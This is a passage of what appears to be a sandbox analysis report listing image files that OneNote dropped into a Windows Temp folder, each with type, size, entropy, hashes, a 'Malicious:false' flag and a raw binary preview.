                                                                                                                                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5BD06BCF-A833-4625-B7FE-5BC963192CEB}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59707
                                                                                                                                                                                                                  Entropy (8bit):7.858445368171059
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                                                                                                  MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                                                                                                  SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                                                                                                  SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                                                                                                  SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5C8FDD59-673C-4712-93EF-9F5ADAE865E8}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):29187
                                                                                                                                                                                                                  Entropy (8bit):7.971308326749753
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                                                                                                  MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                                                                                                  SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                                                                                                  SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                                                                                                  SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5CD4A12A-BC38-4183-A3B0-7DF48DC118BF}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6019A482-DDE0-4BE7-98D5-AA0ECA202BF1}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{63A7963F-8E42-4F8E-844A-F3C14DC0C466}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{63DD725C-3AB4-45EB-A35A-C6FED1D1FF61}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2266
                                                                                                                                                                                                                  Entropy (8bit):5.563021222358941
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                                                                                                  MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                                                                                                  SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                                                                                                  SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                                                                                                  SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{646287FE-1DC6-4DA3-85DD-5D0B7451A61C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25622
                                                                                                                                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{652D6712-B1DE-458D-93F4-8FA97E912A67}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6618D600-954D-4F10-893B-476F9EE383CA}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{66216B00-34D2-455B-813E-2A028D9F7EE5}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):64118
                                                                                                                                                                                                                  Entropy (8bit):7.742974333356952
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                                                                                                  MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                                                                                                  SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                                                                                                  SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                                                                                                  SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6762DBA0-0A4F-4AF6-99C9-6D2C143C4933}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{67E11D36-35B5-471A-B3FB-D89244A1C45C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41893
                                                                                                                                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                                  Malicious:false
